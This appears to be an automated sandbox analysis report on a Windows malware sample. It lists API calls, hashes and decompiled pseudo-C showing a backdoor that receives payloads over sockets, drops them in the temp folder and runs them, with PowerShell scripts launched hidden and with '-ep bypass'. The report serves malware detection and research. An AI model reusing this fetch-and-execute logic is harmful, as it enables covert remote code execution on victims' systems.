Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 92526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004027BF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25networkCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,0000004A,?,?), ref: 004027D7
WSACleanup.WSOCK32(wow64), ref: 004027E8
ExitProcess.KERNEL32(00000000,wow64), ref: 00402F46

Strings

wow64, xrefs: 004027DE
J, xrefs: 004027C5

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CleanupExitProcProcessWindow
String ID: J$wow64
API String ID: 4061260214-814445302
Opcode ID: 0bb68de29b4abb3326481840c65a8d08c8233dd0c44de92136c2834c006e4775
Instruction ID: e471e3a03143c4bf4ba43927f2f51144a9331e572b3d25a362d2f399fd237b2a
Opcode Fuzzy Hash: 0bb68de29b4abb3326481840c65a8d08c8233dd0c44de92136c2834c006e4775
Instruction Fuzzy Hash: D4E04831104119B6CB016E969D4AE9F3A29EB11395F108437FA15340D145FD4951BA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 87%

			_entry_(void* __eflags) {
				char _v1028;
				intOrPtr _v1036;
				void* _v1048;
				char _v1052;
				int _t7;
				void* _t13;
				void* _t15;
				void* _t26;
				void* _t29;

				_t29 = __eflags;
				 *0x40523b = GetModuleHandleA(0);
				_t7 = GetCommandLineA();
				 *0x405237 = _t7;
				_push(0xa);
				_push( *0x405237);
				_push(0);
				ExitProcess( *0x40523b); // executed
				ExitProcess(_t7); // executed
				E00402BA3( &_v1052, _t26 - _t26 + 0xfffffbf4);
				CreateThread(0, 0, E004026A1, E004027BF, 0, 0); // executed
				_v1048 = OpenMutexA(0x100000, 0, "wow64");
				CreateMutexA(0, 0, "wow64"); // executed
				_t13 = E00402938(_t29, "start"); // executed
				if(_t13 == 0) {
					L4:
					EnumWindows(E00402487, 0); // executed
					_t15 = E0040287E(); // executed
					_t32 = _t15 - 0x1000;
					if(_t15 == 0x1000) {
						goto L3;
					}
					GetModuleFileNameA(0,  &_v1028, 0x100);
					E004020A8(_t32, "wow64", 0,  &_v1028, "start", 0, 1); // executed
				} else {
					if(_v1036 == 0) {
						L3:
						E00401549();
						goto L4;
					}
				}
				Sleep(0xea60); // executed
				return 0;
			}

0x00401000
0x00401007
0x0040100c
0x00401011
0x00401016
0x00401018
0x0040101e
0x00401026
0x0040102c
0x00401045
0x0040105c
0x00401072
0x00401081
0x0040108b
0x00401092
0x004010a2
0x004010a9
0x004010ae
0x004010b3
0x004010b8
0x00000000
0x00000000
0x004010c8
0x004010e4
0x00401094
0x0040109b
0x0040109d
0x0040109d
0x00000000
0x0040109d
0x0040109b
0x004010ee
0x004010f6

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401002
GetCommandLineA.KERNEL32(00000000), ref: 0040100C
ExitProcess.KERNEL32(00000000,0000000A,00000000), ref: 00401026

Part of subcall function 00401031: CreateThread.KERNEL32 ref: 0040105C
Part of subcall function 00401031: OpenMutexA.KERNEL32 ref: 0040106D
Part of subcall function 00401031: CreateMutexA.KERNEL32(00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,0040102B), ref: 00401081
Part of subcall function 00401031: EnumWindows.USER32(00402487,00000000), ref: 004010A9
Part of subcall function 00401031: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF), ref: 004010C8
Part of subcall function 00401031: Sleep.KERNEL32(0000EA60,wow64,00000000,?,start,00000000,00000001,00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64), ref: 004010EE

ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 0040102C

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateExitModuleMutexProcess$CommandEnumFileHandleLineNameOpenSleepThreadWindows
String ID:
API String ID: 1669962659-0
Opcode ID: e5b29f28231eee123b093c188682c7bb096b9924fc9a2224883ea987f075d269
Instruction ID: 121a3906fec7991db4996dfbd8df91328fccd31b89f6c238fca73f2b610c70d3
Opcode Fuzzy Hash: e5b29f28231eee123b093c188682c7bb096b9924fc9a2224883ea987f075d269
Instruction Fuzzy Hash: C7D0C9B0940B00A9DB103F719E47B0A3929FF00749F04007FF100790F5CBB91250AE1E

Uniqueness

Uniqueness Score: -1.00%

Function 00620DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E02
SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E07

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 2fbe6bc607270213b2c87e967fc902fb63fae9949cdf43a4978251f57da8e000
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BBD0123114512C77D7002B94DC09BCDBB1C9F05B66F008011FB0DD9181C7709D4046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00818441, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 00818489

Memory Dump Source

Source File: 00000000.00000002.263817996.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 15a884e9d03817655b1d3073239e746deae382e19cb06c3695a0135e8a1b4db9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E9F06232500715ABD7202AF9A88EBAE76ECFF49724F140529F646D10C0DE70E8854A65

Uniqueness

Uniqueness Score: -1.00%

Function 00620920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00620929

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 7ba80916a48acbfb0f046a5eb73e9b1892c8f9a247d3f52fd2d0df5884ae7060
Instruction ID: c0089d607f9342f2c15a261cd068abafb40f64debc35d3030ca853ef88393cfd
Opcode Fuzzy Hash: 7ba80916a48acbfb0f046a5eb73e9b1892c8f9a247d3f52fd2d0df5884ae7060
Instruction Fuzzy Hash: 879004F07441F051DC3035DC0C01F4500111741775F7037107130FF1D4DF4455000115

Uniqueness

Uniqueness Score: -1.00%

Function 00818100, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00818151

Memory Dump Source

Source File: 00000000.00000002.263817996.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 51943df38d7e120ddf35493e69e101548d8b9e0322a8e292779107eec6857d41
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B6112D79A00208FFDB01DF98C985E98BBF5EF08351F058094F9489B361D771EA90DB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402A1E, Relevance: 3.0, APIs: 2, Instructions: 36
networkCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00402A1E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v12;
				char _v24;
				char* _t12;
				char* _t13;

				E00402B69(_a4, 0,  &_v24, _a16, 0);
				_t13 =  &_v12;
				if(_a16 == 0) {
					_t13 = 0;
				}
				_push(_t13);
				_push(0);
				_push(0);
				_t12 =  &_v24;
				_push(_t12);
				_push(0);
				L0040309C();
				if(_t12 == 1) {
					_push(0);
					_push(_a12);
					_push(_a8);
					_push(_a4);
					L00403096();
					return _t12;
				}
				return _t12;
			}

0x00402a35
0x00402a3a
0x00402a41
0x00402a43
0x00402a43
0x00402a45
0x00402a46
0x00402a48
0x00402a4a
0x00402a4d
0x00402a4e
0x00402a50
0x00402a58
0x00402a5a
0x00402a5c
0x00402a5f
0x00402a62
0x00402a65
0x00000000
0x00402a65
0x00402a6e

APIs

select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A50
recv.WSOCK32(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A65

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: c1b92c266a3d91e0cce039593a64a1d45ddd3c21970734d42405cbeb75fb35dd
Instruction ID: ea79f095d07083bd77b6dff75327fd53751f5ca0cce278aa73f82539cec42be3
Opcode Fuzzy Hash: c1b92c266a3d91e0cce039593a64a1d45ddd3c21970734d42405cbeb75fb35dd
Instruction Fuzzy Hash: 5CF05E3160020DBAEF20DE91CD4AFEF3B2DEB80715F104036FA04B80D1D7B59A508A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3C, Relevance: 2.6, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402E3C(intOrPtr _a4) {
				char* _v8;
				short _v10;
				char _v12;
				char _v16;
				char _v268;
				char _v272;
				char _v1296;
				intOrPtr _t31;
				intOrPtr _t34;
				short _t37;
				intOrPtr _t45;
				void* _t48;
				char* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				void* _t52;

				E00402BA3( &_v1296,  &_v16 - _t52);
				E00402BBA(_a4, 0xffffffff,  &_v1296);
				_t49 =  &_v1296;
				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
				_t51 =  *((intOrPtr*)(_t31 + 0xc));
				_t45 =  *((intOrPtr*)(_t31 + 0x10));
				do {
					_t51 =  *_t51;
					_t50 =  *((intOrPtr*)(_t51 + 0x30));
					_t48 = 0;
					while( *((char*)(_t48 + _t49)) != 0) {
						_t34 =  *_t50;
						if(_t34 < 0x41 || _t34 > 0x5a) {
							__eflags = _t34 - 0x61;
							if(__eflags >= 0) {
								__eflags = _t34 - 0x7a;
								if(__eflags <= 0) {
									_t34 = _t34 - 0x20;
									__eflags = _t34;
								}
							}
						} else {
							_t34 = _t34 + 0x20;
						}
						if( *((intOrPtr*)(_t48 + _t49)) == _t34 ||  *((intOrPtr*)(_t48 + _t49)) == _t34) {
							_t50 = _t50 + 2;
							_t48 = _t48 + 1;
							continue;
						} else {
							goto L11;
						}
					}
					return  *((intOrPtr*)(_t51 + 0x18));
					L11:
					_t60 = _t51 - _t45;
				} while (_t51 != _t45);
				_t37 = E00402CB2(_t60,  &_v1296,  &_v268);
				_v12 = _t37;
				_v10 = _t37;
				_v10 = _v10 + 2;
				_v8 =  &_v268;
				_v272 = 0;
				_push( &_v272);
				_push( &_v12);
				_push(0);
				_push(0);
				 *((intOrPtr*)(E00402F2C(E00402E3C("ntdll.dll"), "LdrLoadDll")))();
				return _v272;
			}

0x00402e53
0x00402e64
0x00402e69
0x00402e75
0x00402e78
0x00402e7b
0x00402e7e
0x00402e7e
0x00402e80
0x00402e83
0x00402e85
0x00402e91
0x00402e95
0x00402ea0
0x00402ea2
0x00402ea4
0x00402ea6
0x00402ea8
0x00402ea8
0x00402ea8
0x00402ea6
0x00402e9b
0x00402e9b
0x00402e9b
0x00402eae
0x00402eb7
0x00402eba
0x00000000
0x00000000
0x00000000
0x00000000
0x00402eae
0x00000000
0x00402eb5
0x00402ebd
0x00402ebd
0x00402ecf
0x00402ed4
0x00402ed8
0x00402edc
0x00402ee7
0x00402eea
0x00402efa
0x00402efe
0x00402eff
0x00402f01
0x00402f18
0x00000000

Strings

ntdll.dll, xrefs: 00402F03
LdrLoadDll, xrefs: 00402F0D

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: LdrLoadDll$ntdll.dll
API String ID: 0-2564759627
Opcode ID: de77dd7bbf48fb4f85883d8bdcc5d9a65b77af46ab1ecb45cf3c28013aa7b406
Instruction ID: 96b1fd0fbdf81b4c972a49db2f171c9828f31c4425326f7eda9ba1a30491851b
Opcode Fuzzy Hash: de77dd7bbf48fb4f85883d8bdcc5d9a65b77af46ab1ecb45cf3c28013aa7b406
Instruction Fuzzy Hash: EB21F571940218AADB21CF54C948BCEB7B8EF15314F1041EBE490B72C2D7BCAA468F99

Uniqueness

Uniqueness Score: -1.00%

Function 0062308C, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de77dd7bbf48fb4f85883d8bdcc5d9a65b77af46ab1ecb45cf3c28013aa7b406
Instruction ID: 9fbac2231086387ca16b2f7d89940edb8ac2ac102c7253590764c715228319c0
Opcode Fuzzy Hash: de77dd7bbf48fb4f85883d8bdcc5d9a65b77af46ab1ecb45cf3c28013aa7b406
Instruction Fuzzy Hash: 8621F375904638ABCB20DF54EC45BCEB7BAEF05310F14419AE891A7341D738AB82CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00817D1E, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263817996.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: ea442f53499ec638a94f87d25dc382e697bafda8b247f59232bff7eac82ce68a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 831130B23441049FD754DE55EC81EE673EAFF89724B298099E908CB315E675E842C760

Uniqueness

Uniqueness Score: -1.00%

Function 00620D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 3838f9bc008ca83b66d51183be70df9ced09faa51e6fe17e8d156c22292faee5
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 40F0A4766019149FEB11CF64D805BAD73BAEF84315F0449A4D806D7242D330A9418F50

Uniqueness

Uniqueness Score: -1.00%

Function 00402D95, Relevance: .0, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402D95(signed int __eax, signed int _a4) {
				signed int _t8;
				void* _t13;
				signed int _t15;

				asm("rdtsc");
				_push(_t13);
				_push(_t15);
				asm("rcr eax, 0x10");
				_t8 = 0x3cfb5543 + __eax * 0x1e7319 + _t13;
				if(_t15 != 0) {
					_t8 = _t8 * _t15;
				}
				return _t8 * _a4 >> 0x20;
			}

0x00402d95
0x00402d9b
0x00402d9c
0x00402daa
0x00402dad
0x00402db1
0x00402db3
0x00402db3
0x00402dc3

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
Instruction ID: 2f5f9d513595aa5d0ed47eba0ffe9d564a5c869b0d152602619113e4d880ee55
Opcode Fuzzy Hash: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
Instruction Fuzzy Hash: 03D05B7B7041062FB74C904FAE079A7665FD5D2364318D437B500D42D5F551DA450074

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F, Relevance: 35.5, APIs: 15, Strings: 5, Instructions: 494
memorynetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040197F(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				void* _v64;
				long _v68;
				char _v72;
				void* _v80;
				char _v84;
				char _v112;
				char _v124;
				CHAR* _v128;
				void* _v132;
				void* _v136;
				char _v936;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				void* _v1748;
				int _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				int _v1764;
				char _v1768;
				int _v1788;
				int _v1792;
				char _v1796;
				char _v1809;
				char _v1810;
				char _v1811;
				char _v1812;
				char* _t255;
				void* _t257;
				void* _t261;
				intOrPtr _t264;
				long _t272;
				void* _t278;
				void* _t297;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				void* _t301;
				void* _t306;
				void* _t307;
				void* _t309;
				void* _t312;
				intOrPtr* _t314;
				char* _t315;
				CHAR* _t316;
				void** _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				CHAR* _t323;
				void* _t324;
				void* _t325;

				_t309 = __edx;
				E00402BA3( &_v1812,  &_v16 - _t325);
				_v1748 = CreateEventA(0, 0, 1, 0);
				if(_a4 == 0) {
					L3:
					_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4);
					_t329 = _t205;
					if(_t205 == 0) {
						L67:
						E00402A71(_t205, _v936);
						_t319 =  &_v936;
						_t297 = 0xc8;
						do {
							 *_t319 = 0;
							_t319 =  &(_t319[1]);
							_t297 = _t297 - 1;
							__eflags = _t297;
						} while (_t297 != 0);
						do {
							__eflags = 0;
							asm("repe scasd");
						} while (0 != 0);
						CloseHandle(_v1748);
						E0040151C( &_v64);
						E0040151C( &_v128);
						__eflags = _v1792 - 1;
						if(__eflags == 0) {
							E004023E6(__eflags, "wow64");
							ExitProcess(0);
						}
						return _v1788;
					}
					_v128 = _t205;
					_t314 = _v128;
					 *_t314 = 0x100;
					_push(_t314);
					_push(_t314 + 0x52);
					_push(2);
					L004030E4();
					_t205 = E004010F9(_t309, _t329,  &_v936, _a4, _a8, 0xa);
					_t330 = _t205;
					if(_t205 == 0) {
						goto L67;
					}
					_v72 = 2;
					_v68 = 4;
					_v1764 = 1;
					_v1760 = 0x927c0;
					_v1756 = 0x2710;
					_push(0);
					_push(0);
					_push( &_v1768);
					_push(0);
					_push(0);
					_push(0xc);
					_push( &_v1764);
					_push(0x98000004);
					_push(_v936);
					L004030C0();
					E00402B1C(0x405081, _t314 + 0x1c, 0x32);
					 *((short*)(_t314 + 0x4e)) = E004027F9(_t330);
					if(E0040287E() - 0x2000 > 0) {
						 *((char*)(_t314 + 0x50)) = 2;
					}
					 *((char*)(_t314 + 0x51)) = E0040284C();
					 *((char*)(_t314 + 0x7b)) = 0;
					GetVolumeInformationA(0, 0, 0, _t314 + 0x7c, 0, 0, 0, 0);
					E004025D9(0x405081, 0x32, _t314 + 0x4e, 0x32);
					_t205 = E00402997(_v936,  &(_v128[0x1c]), 0x64, 0);
					L8:
					while(1) {
						while(_v80 == 0 && _v136 != 4) {
							E00402B69(_v936, 0,  &_v124, 0x78, 0);
							_push( &_v112);
							_push(0);
							_push(0);
							_t205 =  &_v124;
							_push(_t205);
							_push(0);
							L0040309C();
							if(_t205 < 0) {
								goto L67;
							}
							if(_t205 != 0) {
								break;
							}
							if(_v132 != 0 || _v136 != 0) {
								goto L67;
							} else {
								_v1788 = 1;
								continue;
							}
						}
						_t315 = _v128;
						__eflags = _v132;
						if(_v132 != 0) {
							L17:
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								__eflags = _v80;
								if(__eflags != 0) {
									L26:
									_t310 = _v132;
									_t306 = ( *(_t315 + 2) & 0x0000ffff) - _v132;
									__eflags = _v80 - _t306;
									if(__eflags <= 0) {
										_t306 = _v80;
									}
									E00402B1C(_v84, _t310 + _t315 + 4, _t306);
									_v84 = _v84 + _t306;
									_v80 = _v80 - _t306;
									_v132 = _v132 + _t306;
									_t205 = E00402D74(__eflags,  &_v132, _t315 + 2, 2);
									__eflags = _t205 - 1;
									if(_t205 != 1) {
										L58:
										_v136 = 0;
										L66:
										continue;
									} else {
										E004025D9(0x405081, 0x32, _t315 + 4,  *(_t315 + 2) & 0x0000ffff);
										_t299 =  *(_t315 + 1) & 0x000000ff;
										__eflags =  *_t315 - 0xffff;
										if( *_t315 != 0xffff) {
											__eflags =  *_t315;
											if( *_t315 != 0) {
												_t205 = E00402997( *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)), _t315 + 4,  *(_t315 + 2) & 0x0000ffff, 0);
												L57:
												_v132 = 0;
												goto L58;
											}
											_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4);
											__eflags = _t205;
											if(_t205 == 0) {
												goto L67;
											}
											_t320 = _t205;
											E00402B1C(_t315, _t320, 0x180);
											 *((intOrPtr*)(_t320 + 0x180)) =  &_v1736;
											 *(_t320 + 0x184) = _t299;
											_t150 = _t320 + 0x188; // 0x188
											E00402B1C( &_v1748, _t150, 4);
											_t255 =  &_v936;
											 *((intOrPtr*)(_t320 + 0x18c)) = _t255;
											 *(_t320 + 0x190) = _t320;
											__eflags =  *((char*)(_t320 + 7)) - 4;
											if( *((char*)(_t320 + 7)) == 4) {
												_push(6);
												_push(1);
												_push(0x17);
												L004030B4();
											} else {
												_push(6);
												_push(1);
												_push(2);
												L004030B4();
											}
											 *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)) = _t255;
											_v1752 = 1;
											_push(4);
											_push( &_v1752);
											_push(1);
											_push(6);
											_push( *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)));
											L004030A8();
											 *((intOrPtr*)(_t324 + _t299 * 4 - 0x6c4)) = CreateThread(0, 0, E004015FC, _t320, 0, 0);
											goto L57;
										}
										_t300 = _v128;
										_t257 =  *(_t300 + 2) & 0x0000ffff;
										 *((char*)(_t257 + _t300 + 4)) = 0;
										_t321 = _t257;
										E00402BA3( &_v1796, 4);
										while(1) {
											_t322 = _t321;
											__eflags = _t322;
											if(__eflags == 0) {
												break;
											}
											__eflags =  *((char*)(_t322 + _t300 + 8)) - 0x23;
											if(__eflags != 0) {
												_t321 = _t322 - 1;
												__eflags = _t321;
												continue;
											}
											_t83 = _t300 + 9; // 0x9
											_v1796 = _t322 + _t83;
											 *((char*)(_t322 + _t300 + 8)) = 0;
											break;
										}
										_v1812 = 0x65;
										_v1811 = 0x78;
										_v1810 = 0x65;
										_v1809 = 0;
										_t261 = E00402CE4(__eflags, _t300 + 8);
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x7362762e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x7362762e) {
											_v1812 = 0x76;
											_v1811 = 0x62;
											_v1810 = 0x73;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x7461622e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x7461622e) {
											_v1812 = 0x62;
											_v1811 = 0x61;
											_v1810 = 0x74;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x646d632e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x646d632e) {
											_v1812 = 0x63;
											_v1811 = 0x6d;
											_v1810 = 0x64;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x3173702e;
										if(__eflags == 0) {
											_v1812 = 0x70;
											_v1811 = 0x73;
											_v1810 = 0x31;
											_v1809 = 0;
										}
										_t264 = E0040121E(__eflags, _t300 + 8,  &_v1740);
										__eflags = _t264 - 0x400;
										if(_t264 <= 0x400) {
											L49:
											_t205 = E0040151C( &_v1740);
											goto L57;
										} else {
											_v1744 = _t264;
											_t323 = _v128;
											 *((short*)(_t323 + 2)) = 4;
											E004025D9(0x405081, 0x32, _t323 + 1, 3);
											E004025D9(0x405081, 0x32, _t323 + 4, 4);
											E00402997(_v936, _t323 + 1, 7, _v1748);
											_t316 = _v128;
											_t272 = GetTempPathA(0x200, _t316);
											_t317 =  &(_t316[_t272]);
											__eflags =  &(_t316[_t272]);
											asm("stosb");
											_t127 = E00402D95(0x5c, 4) + 4; // 0x4
											_t301 = _t127;
											do {
												_t274 = E00402D95(_t274, 0x18) + 0x61;
												asm("stosb");
												_t301 = _t301 - 1;
												__eflags = _t301;
											} while (__eflags != 0);
											asm("stosb");
											_t128 =  &_v1812; // 0x65
											_t278 = E00402CE4(__eflags, _t128);
											_t130 =  &_v1812; // 0x65
											E00402B1C(_t130, _t317, _t278 + 1);
											E00402D95(E00402DC6(_v128, _v1740, _v1744, 2, 0), 0x18);
											asm("stosb");
											asm("loop 0xfffffff5");
											asm("stosb");
											__eflags = _v1812 - 0x317370;
											if(__eflags != 0) {
												E004020A8(__eflags, _t323 + 0x200, 0x14, _v128, 0, 1, 0);
											} else {
												E00402B1C("-WindowStyle Hidden -ep bypass -file \"", _t323 + 0x400, 0x26);
												 *((short*)(E00402CE4(__eflags, _v128) + _t323 + 0x426)) = 0x22;
												E00402B1C(_v128, _t323 + 0x426, _t290);
												E004020A8(__eflags, _t323 + 0x200, 0x14, "powershell", _t323 + 0x400, 1, 0);
											}
											goto L49;
										}
									}
								}
								_t205 = E00402A1E(__eflags, _v936, _v64, 0x10000, 0);
								__eflags = _t205;
								if(_t205 <= 0) {
									goto L67;
								}
								_v80 = _t205;
								E00402B1C( &_v64,  &_v84, 4);
								goto L26;
							}
							__eflags =  *_t315 - 0xff;
							if( *_t315 != 0xff) {
								L21:
								_t298 =  *(_t315 + 1) & 0x000000ff;
								__eflags =  *(_t324 + _t298 * 4 - 0x3a4);
								if( *(_t324 + _t298 * 4 - 0x3a4) != 0) {
									 *(_t324 + _t298 * 4 - 0x3a4) = 0;
								}
								goto L58;
							}
							__eflags =  *(_t315 + 1) - 0xfe;
							if( *(_t315 + 1) != 0xfe) {
								goto L21;
							}
							_v1792 = 1;
							goto L67;
						}
						__eflags = _v136 - 4;
						if(_v136 != 4) {
							__eflags = _v80;
							if(__eflags != 0) {
								L62:
								_t307 = _v136;
								_t312 = 4 - _v136;
								__eflags = _v80 - 4;
								if(_v80 < 4) {
									_t312 = _v80;
								}
								_t205 = E00402B1C(_v84, _t307 + _t315, _t312);
								_v84 = _v84 + _t312;
								_v80 = _v80 - _t312;
								_v136 = _v136 + _t312;
								__eflags = _v136 - 4;
								if(_v136 == 4) {
									_t205 = E004025D9(0x405081, 0x32, _t315, 4);
								}
								goto L66;
							}
							_t205 = E00402A1E(__eflags, _v936, _v64, 0x10000, 0);
							__eflags = _t205;
							if(_t205 <= 0) {
								goto L67;
							}
							_v1788 = 1;
							_v80 = _t205;
							E00402B1C( &_v64,  &_v84, 4);
							goto L62;
						}
						goto L17;
					}
				}
				_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4);
				if(_t205 == 0) {
					goto L67;
				} else {
					_v64 = _t205;
					goto L3;
				}
			}

0x0040197f
0x00401996
0x004019a8
0x004019b2
0x004019d2
0x004019e0
0x004019e5
0x004019e7
0x00402031
0x00402037
0x0040203c
0x00402042
0x00402047
0x00402047
0x0040204d
0x00402050
0x00402050
0x00402050
0x00402053
0x00402053
0x00402060
0x00402060
0x0040206a
0x00402073
0x0040207c
0x00402081
0x00402088
0x0040208f
0x00402096
0x00402096
0x004020a5
0x004020a5
0x004019ed
0x004019f0
0x004019f3
0x004019f9
0x004019fd
0x004019fe
0x00401a00
0x00401a14
0x00401a19
0x00401a1b
0x00000000
0x00000000
0x00401a21
0x00401a28
0x00401a2f
0x00401a39
0x00401a43
0x00401a4d
0x00401a4f
0x00401a57
0x00401a58
0x00401a5a
0x00401a5c
0x00401a64
0x00401a65
0x00401a6a
0x00401a70
0x00401a80
0x00401a8a
0x00401a9a
0x00401a9c
0x00401a9c
0x00401aa5
0x00401aa8
0x00401abe
0x00401ad0
0x00401ae6
0x00000000
0x00401aeb
0x00401aeb
0x00401b0a
0x00401b12
0x00401b13
0x00401b15
0x00401b17
0x00401b1a
0x00401b1b
0x00401b1d
0x00401b25
0x00000000
0x00000000
0x00401b2d
0x00000000
0x00000000
0x00401b33
0x00000000
0x00401b46
0x00401b46
0x00000000
0x00401b46
0x00401b33
0x00401b52
0x00401b55
0x00401b59
0x00401b68
0x00401b68
0x00401b6d
0x00401bab
0x00401baf
0x00401be0
0x00401be0
0x00401be7
0x00401be9
0x00401bec
0x00401bee
0x00401bee
0x00401bfa
0x00401bff
0x00401c02
0x00401c05
0x00401c12
0x00401c17
0x00401c1a
0x00401f98
0x00401f98
0x0040202c
